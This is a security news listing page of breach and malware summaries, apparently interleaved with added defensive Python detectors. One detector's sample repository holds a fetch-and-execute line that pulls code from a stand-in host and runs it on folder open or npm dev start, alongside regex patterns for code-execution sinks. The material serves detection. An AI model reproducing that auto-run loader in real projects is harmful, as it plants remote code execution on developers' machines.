<ciso brief />

All news in category “Incidents and Data Breaches”

2725 articles · page 43 of 137

Smashing Security Podcast 456: DDoS, Ransomware Fails

🛡️ In episode 456 of Smashing Security, Graham Cluley and guest Paul Ducklin examine allegations that an internet archiving service operator weaponised its own CAPTCHA to DDoS a Finnish blogger, tampered with archive content to smear them, and issued bizarre threats about AI-generated pornography. The hosts also cover a ransomware crew that accidentally corrupted victims' decryption keys, rendering extortion efforts ineffective. The episode closes with a calm Pick of the Week and a furious rant about web forms.

UFP Technologies Says Data Stolen in Cyberattack

🔒 UFP Technologies disclosed a cybersecurity incident detected on February 14 that compromised portions of its IT environment and resulted in data theft. The company says it isolated affected systems, engaged external cybersecurity advisors, and believes the intruder has been removed with access restored in all material respects. Some functions such as billing and label making were impacted, and the firm is investigating whether personal information was exfiltrated.

Fake Next.js Interview Repos Deliver JavaScript Backdoor

⚠️ A coordinated campaign impersonating Next.js job interview materials uses malicious repositories to achieve remote code execution on developers' machines. The repositories trigger payloads when a VS Code workspace is opened, when the npm dev server starts, or when backend initialization runs, downloading and executing an in-memory JavaScript backdoor. The staged malware profiles the host, registers with C2 infrastructure, and supports file enumeration and staged exfiltration. Microsoft advises enforcing VS Code Workspace Trust, reducing secrets on endpoints, and using short-lived, least-privilege tokens.

Google Disrupts UNC2814 GRIDTIDE Campaign Targeting Telcos

🔒 Google and industry partners disrupted infrastructure used by suspected China-linked espionage group UNC2814, which deployed a C-based backdoor named GRIDTIDE that abuses the Google Sheets API to conceal command-and-control traffic. GRIDTIDE supports file upload/download and arbitrary shell execution and was observed on endpoints containing PII. Google terminated attacker-controlled Cloud projects, disabled abused accounts, and is notifying impacted organizations while offering support.

Chinese Cyberspies Used Google Sheets to Target Telecoms

🔐 Google’s Threat Intelligence Group, Mandiant, and partners disrupted a global espionage campaign attributed to a suspected Chinese actor tracked as UNC2814 that infiltrated telecom firms and government agencies across dozens of countries. The actor deployed a new C-based backdoor named GRIDTIDE that abused the Google Sheets API for covert command-and-control, authenticating with a hardcoded service account key and polling spreadsheet cells for instructions. GRIDTIDE supports execution, upload and download commands via URL-safe Base64 exchanges and hides output in sheet cells; Google and partners disabled cloud projects, revoked API access, sinkholed domains, and offered victim support.

Active Exploitation of Cisco SD‑WAN Controller by UAT‑8616

🔒 Cisco Talos reports active exploitation of CVE-2026-20127 in Cisco Catalyst SD-WAN Controller, enabling unauthenticated attackers to bypass authentication and obtain administrative privileges. Talos attributes the activity to a sophisticated actor tracked as UAT-8616 and finds evidence dating to 2023, including software downgrades and subsequent exploitation of CVE-2022-20775 to escalate to root. Customers are urged to follow vendor advisories, validate control peering events, and apply the detection and remediation guidance provided.

Marquis Sues SonicWall Over Cloud Backup Breach Lawsuit

🔒 Marquis Software Solutions has filed suit against SonicWall, alleging gross negligence and misrepresentation after a ransomware attack on August 14, 2025 that followed a compromise of a SonicWall firewall. Investigators say the attacker accessed configuration backups stored in SonicWall’s MySonicWall cloud—an exposure Marquis attributes to an API code change in February 2025—and used configuration data and AES-256-encrypted credentials to bypass MFA. The stolen files included extensive personal and financial information; Marquis says the incident disrupted operations for 74 U.S. banks and forced the firm to defend more than 36 consumer class actions while seeking monetary damages, indemnification and equitable relief.

Disrupting GRIDTIDE: Global Telecom Cyber Espionage

🛡️ Google Threat Intelligence Group, Mandiant, and partners executed a coordinated disruption against a global espionage campaign attributed to UNC2814 that abused cloud services for covert command and control. Investigators identified a novel C-based backdoor called GRIDTIDE that uses Google Sheets APIs as a high-availability C2 channel, protected by an AES-128-CBC key and service account credentials. Actions included terminating attacker-controlled Google Cloud projects, disabling accounts and Sheets API access, sinkholing infrastructure, and publishing IOCs and detection guidance to support defenders.
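The three GRIDTIDE write-ups above share one defender-relevant detail: an implant that authenticates with a hardcoded service-account key and polls spreadsheet cells for tasking talks to the Sheets API on a schedule, which is something a proxy or DNS log can show even though the cell contents never appear in it. The following is an added example, not tooling from Google, Mandiant or any of the sources cited; it reads a constructed, simplified proxy log (ISO timestamp, source host, destination host, all invented) and flags hosts whose requests to sheets.googleapis.com recur at a near-constant interval. The thresholds are assumptions to tune against your own baseline.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SHEETS_API = "sheets.googleapis.com"

# Constructed proxy log: "<ISO timestamp> <source host> <destination host>".
# Hosts, times and the format itself are invented for this example.
# srv-billing-01 polls every ~30 s; ws-alice and ws-carol are bursty humans.
SAMPLE_LOG = """\
2026-02-10T08:00:00Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:00:05Z ws-carol sheets.googleapis.com
2026-02-10T08:00:07Z ws-carol sheets.googleapis.com
2026-02-10T08:00:09Z ws-carol sheets.googleapis.com
2026-02-10T08:00:30Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:01:01Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:01:30Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:02:00Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:02:30Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:03:01Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:03:31Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:03:40Z ws-carol sheets.googleapis.com
2026-02-10T08:04:00Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:04:30Z srv-billing-01 sheets.googleapis.com
2026-02-10T08:05:12Z ws-alice sheets.googleapis.com
2026-02-10T08:20:00Z ws-carol sheets.googleapis.com
2026-02-10T08:21:15Z ws-carol sheets.googleapis.com
2026-02-10T08:30:00Z ws-dave docs.google.com
2026-02-10T08:47:03Z ws-alice sheets.googleapis.com
2026-02-10T09:02:00Z ws-carol sheets.googleapis.com
2026-02-10T09:10:55Z ws-alice sheets.googleapis.com
"""


def parse_log(text):
    """Yield (timestamp, src, dst) from the constructed three-field format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst


def find_sheets_pollers(text, min_requests=6, max_cv=0.2):
    """Return {src: (request_count, mean_gap_seconds, cv)} for hosts whose
    requests to the Sheets API recur at a near-constant interval.

    cv is the coefficient of variation of the inter-request gaps. A backdoor
    that sleeps a fixed time between polls gives cv close to 0; a person
    editing a spreadsheet produces bursts and long idle periods.
    """
    stamps_by_host = defaultdict(list)
    for ts, src, dst in parse_log(text):
        if dst == SHEETS_API:
            stamps_by_host[src].append(ts)

    flagged = {}
    for src, stamps in stamps_by_host.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()  # log lines need not arrive in order
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else 0.0
        if cv <= max_cv:
            flagged[src] = (len(stamps), avg, round(cv, 3))
    return flagged


if __name__ == "__main__":
    for host, (n, gap, cv) in find_sheets_pollers(SAMPLE_LOG).items():
        print(f"{host}: {n} requests, mean gap {gap:.0f}s, cv {cv}")
```

A hit is a lead, not a verdict: the next questions are whether the host has any business reason to use Sheets at all (a billing server normally does not), and, if your proxy records the authorization type, whether requests carry a service-account bearer token rather than a user session.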

Typosquatted NuGet Package Targets Stripe Developers

⚠️ ReversingLabs uncovered a malicious NuGet package named StripeApi.Net that impersonated the widely used Stripe.net .NET library for Stripe payments. The typosquatting listing duplicated icons, documentation and tags and used the publisher name 'StripePayments' while retaining a default avatar to appear credible. The fake package accrued an apparently inflated 180,000-plus downloads by spreading roughly 300 downloads across each of 506 versions. Subtle code changes captured Stripe API keys and a machine identifier and exfiltrated them to an attacker-controlled Supabase database; NuGet removed the package quickly after it was reported, and investigators found only a test entry in the exfiltration database.
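The download-count trick described above leaves a measurable signature: an organic package has a handful of versions with a heavily skewed distribution (the latest release dominates), whereas a package that pushed hundreds of releases to pad its total has many versions with near-identical counts and no dominant one. The code below is an added example, not ReversingLabs' analysis or NuGet's own tooling; it computes that profile from a per-version download table and applies three assumed thresholds. Both data sets are constructed, not real registry numbers, though the padded one mirrors the 506-version shape the report describes.

```python
from statistics import mean, pstdev


def version_download_profile(per_version):
    """per_version maps version string -> download count for one package."""
    counts = list(per_version.values())
    if not counts:
        return {"versions": 0, "total": 0, "per_version": 0.0, "top_share": 0.0, "cv": 0.0}
    total = sum(counts)
    avg = mean(counts)
    return {
        "versions": len(counts),
        "total": total,
        "per_version": avg,
        # share of all downloads held by the single most-downloaded version
        "top_share": max(counts) / total if total else 0.0,
        # coefficient of variation: how evenly the counts are spread
        "cv": pstdev(counts) / avg if avg else 0.0,
    }


def looks_inflated(per_version, min_versions=100, max_top_share=0.05, max_cv=0.5):
    """Heuristic (thresholds are assumptions): many versions, no dominant
    version, and counts that are suspiciously uniform across versions."""
    p = version_download_profile(per_version)
    return (p["versions"] >= min_versions
            and p["top_share"] <= max_top_share
            and p["cv"] <= max_cv)


# Constructed data. ORGANIC: three releases, latest-but-one still dominant.
ORGANIC = {"1.0.0": 120_000, "1.1.0": 45_000, "1.2.0": 15_000}
# PADDED: 506 patch releases with roughly 350 downloads each (deterministic jitter).
PADDED = {f"1.0.{i}": 350 + (i * 37) % 41 - 20 for i in range(506)}


if __name__ == "__main__":
    for name, table in (("organic", ORGANIC), ("padded", PADDED)):
        p = version_download_profile(table)
        print(f"{name}: {p['versions']} versions, {p['total']} downloads, "
              f"top_share={p['top_share']:.3f}, cv={p['cv']:.3f}, "
              f"inflated={looks_inflated(table)}")
```

Registries expose per-version counts in their APIs, so the same check can run against a candidate dependency before it is added; a package whose name is one edit away from a library you already use and whose profile trips this heuristic deserves a manual look at the publisher and the diff against the genuine library.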

Malicious NuGet Packages Exfiltrate ASP.NET Identity

🔒 Security researchers at Socket uncovered four malicious NuGet packages — NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_ — that target ASP.NET developers to steal Identity data and manipulate authorization rules. The packages, published in August 2024 by user hamzazaheer and downloaded over 4,500 times before removal, deploy a localhost proxy and stage payloads to relay stolen data to an external C2. Separately, Tenable disclosed a malicious npm package ambar-src that used a preinstall hook to drop cross-platform malware (Windows, Linux, macOS), enabling full-system compromise and data exfiltration.

Job-themed repo lures target developers with backdoors

🛡️ Microsoft warns that a coordinated campaign is using job-themed repositories—often posing as Next.js projects or technical assessments—to infect developer systems with multi-stage backdoors. Attackers embed workspace automation, build scripts, or server startup hooks so simply opening or building a project can load remote JavaScript and execute in memory. Microsoft advises containing affected endpoints, tracing process trees, hunting for repeated polling to attacker infrastructure, enforcing VS Code Workspace Trust, applying attack surface reduction, enabling cloud reputation checks, and tightening developer trust boundaries.
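The two Microsoft write-ups on job-themed repositories and the ambar-src npm package in the Socket/Tenable item all rely on the same mechanism: code that runs without the developer invoking it, whether a VS Code task set to run on folder open, an npm lifecycle hook such as preinstall or predev, or a startup script that fetches and evaluates remote JavaScript. As an added example (not Microsoft's, Socket's or Tenable's tooling), the scanner below triages a checked-out repository for those three patterns. Assumptions: VS Code's tasks.json schema places the auto-run flag at runOptions.runOn = "folderOpen" (which Workspace Trust suppresses for untrusted folders), npm runs pre/post wrappers and install-time scripts implicitly, and the sample repository contents and hostname are invented.

```python
import json
import re

# npm runs these implicitly during install/publish, whatever the developer typed.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare",
                 "prepublish", "prepublishOnly", "prepack", "postpack"}

URL_RE = re.compile(r"https?://", re.I)
# Sinks that turn downloaded text into running code.
EXEC_SINK_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|child_process|vm\.runIn", re.I)


def is_lifecycle_hook(name, scripts):
    """True if npm would run this script without it being invoked by name:
    an install-time hook, or a pre<x>/post<x> wrapper around another script."""
    if name in NPM_LIFECYCLE:
        return True
    if name.startswith("pre") and name[3:] in scripts:
        return True
    if name.startswith("post") and name[4:] in scripts:
        return True
    return False


def fetches_and_executes(text):
    """Coarse triage heuristic: a URL and an execution sink in the same file."""
    return bool(URL_RE.search(text) and EXEC_SINK_RE.search(text))


def scan_repo(files):
    """files maps repo-relative path -> contents. Returns a list of (path, reason)."""
    findings = []

    tasks_json = files.get(".vscode/tasks.json")
    if tasks_json:
        # Real tasks.json may be JSONC (comments); strip those before parsing in practice.
        for task in json.loads(tasks_json).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append((".vscode/tasks.json",
                                 f"task {task.get('label')!r} runs on folder open: {task.get('command')}"))

    package_json = files.get("package.json")
    if package_json:
        scripts = json.loads(package_json).get("scripts", {})
        for name, cmd in scripts.items():
            if is_lifecycle_hook(name, scripts):
                findings.append(("package.json", f"implicit lifecycle script {name!r}: {cmd}"))

    for path, content in files.items():
        if path.endswith((".js", ".mjs", ".cjs", ".ts")) and fetches_and_executes(content):
            findings.append((path, "downloads a URL and feeds the result to an execution sink"))

    return findings


# Constructed sample repository (hypothetical names, contents and hostname).
SAMPLE_REPO = {
    ".vscode/tasks.json": json.dumps({
        "version": "2.0.0",
        "tasks": [{"label": "setup", "type": "shell",
                   "command": "node scripts/setup.js",
                   "runOptions": {"runOn": "folderOpen"}}],
    }),
    "package.json": json.dumps({
        "name": "nextjs-interview-task",
        "scripts": {"predev": "node scripts/setup.js", "dev": "next dev",
                    "build": "next build", "lint": "next lint"},
    }),
    "scripts/setup.js":
        'fetch("https://example.invalid/stage2").then(r => r.text())'
        '.then(code => new Function(code)());\n',
    "pages/index.js":
        'export default function Home() { return <a href="https://nextjs.org">docs</a>; }\n',
}


if __name__ == "__main__":
    for path, reason in scan_repo(SAMPLE_REPO):
        print(f"{path}: {reason}")
```

The regex stage is deliberately loose and will flag legitimate build tooling; its job is to decide which files a reviewer reads before running `npm install` or opening the folder with Workspace Trust granted, not to replace that review.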

Ex-L3Harris Executive Sentenced for Selling Zero-Day Exploits

🔒 A former senior executive at L3Harris cyber-division Trenchant, Australian national Peter Williams, has been sentenced to 87 months in prison after pleading guilty to stealing and selling zero-day exploits to a Russian broker. He admitted taking eight cyber-exploit components over three years, accepting cryptocurrency payments and providing paid follow-on support. Authorities say the theft cost Trenchant/L3Harris about $35m and posed significant national security risks. Williams was ordered to forfeit $1.3m, cryptocurrency, property and luxury items, and to serve three years of supervised release with special conditions.

Ukrainian Sentenced for Aiding North Korean IT Impostors

🔒 A Ukrainian man was sentenced to five years in prison after admitting he helped North Korean IT workers infiltrate US companies using stolen identities. He pleaded guilty in November 2025 to aggravated identity theft and conspiracy to commit fraud and agreed to forfeit over $1.4 million in cash and cryptocurrency. Authorities say he sold hundreds of stolen identities and provided proxy accounts and laptop farms to disguise foreign workers as US-based.

Defense Contractor Employee Jailed for Selling Zero-Days

🔒 Peter Williams, a 39-year-old former senior employee at L3Harris, was sentenced to just over seven years in prison after pleading guilty to selling eight zero-day exploits to the Russian exploit broker Operation Zero. Prosecutors say he received up to $4 million in cryptocurrency and has been ordered to forfeit proceeds, including properties and luxury items. The theft, which occurred between 2022 and 2025, targeted tools intended for sale only to the U.S. government and select allies and prompted criminal charges and sanctions.

Former L3Harris Manager Sentenced for Selling Zero-Days

🔒 Peter Williams, former head of Trenchant at L3Harris, was sentenced to 87 months in federal prison after admitting he stole and sold zero-day exploit components to the Russian broker Operation Zero. Prosecutors say he transferred at least eight protected exploit components between 2022 and 2025 using a portable external drive and encrypted channels. L3Harris estimates the theft caused $35 million in losses and the sales netted Williams $1.3 million in cryptocurrency. Authorities ordered forfeiture of the crypto, a house, and luxury items, and the U.S. Treasury announced sanctions against the broker.

AI-assisted attacker compromises 600+ FortiGate firewalls

🛡️ AWS security researchers report a Russian-speaking attacker compromised more than 600 FortiGate firewalls between January 11 and February 18, 2026, by exploiting weak or default passwords rather than product vulnerabilities. The actor used a Google Gemini-based AI tool to pivot to additional hosts and deployed reconnaissance tools written in Go and Python. Analysts found clear signs of AI-assisted code generation. Experts urge the use of strong passwords and MFA.

Fake Zoom Meeting Installs Covert Employee Surveillance

🔒 Malwarebytes researchers warn of a convincing fake Zoom meeting page that silently downloads and installs a covert build of Teramind on Windows endpoints. Victims see scripted participants and an “Update Available” countdown that triggers a silent download while a fake Microsoft Store screen displays a staged installation. Because the payload is a repackaged commercial monitoring tool, many defenses may not flag it, so prompt verification and training are essential.

Phishing Campaign Steals Credentials from Freight Firms

📧 A financially motivated threat group dubbed Diesel Vortex has run an extensive phishing campaign since September 2025 targeting freight and logistics operators across the U.S. and Europe, using roughly 52 domains to harvest credentials. Researchers at Have I Been Squatted and partner Ctrl-Alt-Intel discovered exposed repositories and Telegram webhook logs revealing the group's tooling, communications, and an internal mind map describing a call-center style operation. The campaign stole 1,649 unique credential pairs and employed sophisticated evasion — Cyrillic homoglyphs, a nine-stage cloaking chain, voice phishing, Telegram infiltration, and pixel-perfect clones — before coordinated takedowns disrupted the infrastructure.
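Of the evasion techniques listed for Diesel Vortex, the Cyrillic homoglyphs are the one a defender can screen for mechanically: a lure domain is registered in punycode, but once decoded it mixes Cyrillic letters into an otherwise Latin name, and mapping those letters back to their Latin lookalikes gives a skeleton that collides with the brand being imitated. The code below is an added example, not Have I Been Squatted's or Ctrl-Alt-Intel's tooling; it decodes xn-- labels, detects mixed scripts from Unicode character names, and compares the skeleton against a watchlist. The confusables table is a small hand-picked subset (an assumption, not the full Unicode confusables data), and the watchlist and sample domains are constructed.

```python
import unicodedata

# Cyrillic letters that render almost identically to Latin ones in common
# fonts. Assumption: a small hand-picked subset, not the full Unicode
# confusables table.
CYRILLIC_TO_LATIN = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0455": "s", "\u0458": "j",
    "\u04bb": "h", "\u0501": "d", "\u04cf": "l",
}


def script_of(ch):
    """First word of the Unicode character name, e.g. 'LATIN' or 'CYRILLIC'."""
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "UNKNOWN"


def to_unicode(domain):
    """Decode punycode (xn--) labels so the form a victim sees can be inspected."""
    labels = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)


def analyze_domain(domain):
    shown = to_unicode(domain)
    scripts = {script_of(c) for c in shown if c.isalpha()}  # digits/hyphens ignored
    skeleton = "".join(CYRILLIC_TO_LATIN.get(c, c) for c in shown)
    return {"unicode": shown, "scripts": scripts,
            "mixed_script": len(scripts) > 1, "skeleton": skeleton}


def find_lookalikes(domains, protected):
    """Flag domains whose Latin skeleton collides with a protected domain while
    the visible form differs, and any other domain that mixes scripts."""
    hits = []
    for d in domains:
        r = analyze_domain(d)
        if r["skeleton"] in protected and r["unicode"] != r["skeleton"]:
            hits.append((d, f"homoglyph of {r['skeleton']}"))
        elif r["mixed_script"]:
            hits.append((d, "mixed-script name: " + ", ".join(sorted(r["scripts"]))))
    return hits


# Constructed watchlist and lure. The lure swaps the Latin 'e' in "freight"
# for Cyrillic U+0435 and is then encoded the way a registrar would store it.
PROTECTED = {"freight-logistics.example"}
LURE_UNICODE = "fr\u0435ight-logistics.example"
LURE_PUNYCODE = LURE_UNICODE.encode("idna").decode("ascii")
SAMPLE_DOMAINS = ["freight-logistics.example", LURE_PUNYCODE, "dispatch.example"]


if __name__ == "__main__":
    for domain, reason in find_lookalikes(SAMPLE_DOMAINS, PROTECTED):
        print(f"{domain} -> {analyze_domain(domain)['unicode']}: {reason}")
```

Run it over newly observed domains from certificate-transparency feeds or passive DNS with your own brand names in the watchlist; the mixed-script branch catches lures for brands you did not list, at the cost of some false positives from genuinely non-Latin domains that include a Latin token.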

Wynn Resorts Confirms Employee Data Breach After Extortion

🔒 Wynn Resorts confirmed an employee data breach after being listed on the ShinyHunters extortion group's leak site and said it activated incident response procedures. The company engaged external cybersecurity experts to investigate and reported that an unauthorized third party acquired certain employee data. Attackers claimed the stolen data had been deleted; Wynn said it has seen no evidence of publication or misuse to date and that guest operations remain unaffected. The company is offering complimentary credit monitoring and identity protection services to employees.

CarGurus Data Leak Exposes 12.4 Million Account Records

🔓 The extortion group ShinyHunters published a 6.1GB archive on February 21 containing 12.4 million records it alleges were stolen from CarGurus. Have I Been Pwned (HIBP) has added the dataset and reports compromised data types including email addresses, IPs, full names, phone numbers, physical addresses, account IDs, finance application data, dealer details, and subscription information. CarGurus has not confirmed the breach or replied to requests for comment. HIBP says about 70% of the records were already known, leaving roughly 3.7 million newly exposed entries that could be abused for phishing and other scams.